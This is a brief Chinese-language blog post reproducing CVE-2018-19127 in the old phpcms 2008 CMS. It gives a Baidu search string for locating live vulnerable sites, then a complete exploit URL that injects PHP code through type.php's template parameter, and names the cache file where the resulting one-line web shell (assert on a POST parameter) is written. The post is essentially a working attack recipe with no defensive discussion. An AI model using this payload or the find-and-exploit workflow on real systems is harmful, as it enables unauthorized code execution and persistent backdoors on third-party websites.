phpcms2008(CVE-2018-19127)复现

0x01:

目标站目测很小众,因为版本较老。

0x02:

百度搜索目标

“powered by phpcms 2008”

0x03:

找到目标站,请求带有payload的url:

http://www.test.com/type.php?template=tag_(){};@unlink(_FILE_);assert($_POST[test]);{//../rss

 

 

恶意代码被写入到:

http://www.test.com/data/cache_template/rss.tpl.php


为您推荐

发表评论

电子邮件地址不会被公开。 必填项已用*标注

18 − 8 =